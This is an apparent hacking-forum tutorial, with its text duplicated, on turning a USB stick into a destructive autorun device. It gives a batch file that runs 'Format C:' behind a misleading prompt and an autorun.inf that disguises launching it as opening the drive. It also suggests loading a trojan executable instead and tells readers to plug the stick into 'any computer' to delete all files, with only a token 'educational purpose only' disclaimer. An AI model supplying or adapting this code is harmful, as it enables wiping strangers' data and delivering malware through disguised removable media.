USB Virus
In this tutorial I am going to teach you how to make a USB stick autorun a virus.
this is educational purpose only! i
Step 1: Format your USB Stick
Step 2: Open Notepad and put in the following...
Code:
Save this as XXX.bat to the root of your USB Stick.
Step 3: Open Notepad again and put in the following...
Code:
^^Save this as autorun.inf *Make sure you take out the () when you put in your icons name, and you have to save the icon you have on the root of the USB Stick.*
Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an .exe, so if you have a trojan that is .exe then you can make it load that, make sure that you include where it is loading the file from.
Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The USB Stick should format the C: drive therefore deleting all files.
Thank you!
have fun..

In this tutorial I am going to teach you how to make a USB stick autorun a virus.
this is educational purpose only! i
Step 1: Format your USB Stick
Step 2: Open Notepad and put in the following...
Code:
Code:
@echo off
title Delete C:\
cls
echo Are you sure you want to delete all your files? (y/n)
pause > nul
echo Deleting files......
Format C:
Save this as XXX.bat to the root of your USB Stick.
Step 3: Open Notepad again and put in the following...
Code:
Code:
[autorun]
icon=(name of your icon).ico
open=XXX.bat
action=Click here to open your flash drive.
shell\open\command=XXX.bat
^^Save this as autorun.inf *Make sure you take out the () when you put in your icons name, and you have to save the icon you have on the root of the USB Stick.*
Step 4: You are done! Feel free to change it up a little, you can make XXX.bat load up an .exe, so if you have a trojan that is .exe then you can make it load that, make sure that you include where it is loading the file from.
Step 5: To use your USB Stick plug it in to any computer and run your autorun file. The USB Stick should format the C: drive therefore deleting all files.
Thank you!
have fun..




